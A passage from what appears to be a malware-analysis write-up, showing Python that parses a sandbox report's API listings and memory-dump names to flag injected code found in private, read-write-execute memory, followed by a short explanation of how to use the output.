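    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # every function entry opens with its API list
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None or not line:  # tail of a truncated entry, or blank
            continue
        if m := SRC_RE.match(line):
            cur.source_file, cur.base_pe = m["file"], m["pe"] == "true"
        elif m := API_RE.match(line):
            cur.apis.append((m["api"], m["args"], int(m["ref"], 16)))
        elif m := KV_RE.match(line):
            key = m["key"].strip().lower().replace(" ", "_")
            if key in KEPT_KEYS:
                setattr(cur, key, m["val"].strip())
    return entries


def decode_sdmp(name):
    """Decode the dotted .sdmp name. Field positions are an assumption."""
    parts = (name[:-5] if name.endswith(".sdmp") else name).split(".")
    if len(parts) < 7:
        raise ValueError("unexpected sdmp name: " + name)
    return {"process": int(parts[0], 16), "base": int(parts[3], 16),
            "protect": int(parts[4], 16), "type": int(parts[6], 16)}


def injection_indicators(entry):
    """Why this dump source looks like manually mapped code: a region that
    parses as a PE but is MEM_PRIVATE (not image-backed) and RWX."""
    info = decode_sdmp(entry.source_file)
    reasons = []
    if entry.base_pe and info["type"] == MEM_PRIVATE:
        reasons.append("PE header in MEM_PRIVATE region (not MEM_IMAGE)")
    if info["protect"] == PAGE_EXECUTE_READWRITE:
        reasons.append("region is PAGE_EXECUTE_READWRITE")
    return reasons


def api_ids_by_source(entries):
    """Distinct normalised API IDs seen per memory dump source."""
    out = {}
    for e in entries:
        out.setdefault(e.source_file, set()).add(e.api_id)
    return {k: sorted(v) for k, v in out.items()}


ENTRIES = parse_entries(SAMPLE)

if __name__ == "__main__":
    for e in ENTRIES:
        print(e.api_id, [f"{api}@{ref:08X}" for api, _, ref in e.apis])
    print(api_ids_by_source(ENTRIES))
    print(injection_indicators(ENTRIES[0]))
```

Running it over the full function listing of a report gives, per dump source, the set of API families the injected module touches and the exact call sites to set breakpoints on; the two indicators it raises for this source (a PE in private, RWX memory) are the same facts a memory scanner such as a hollowing detector keys on, independent of any signature.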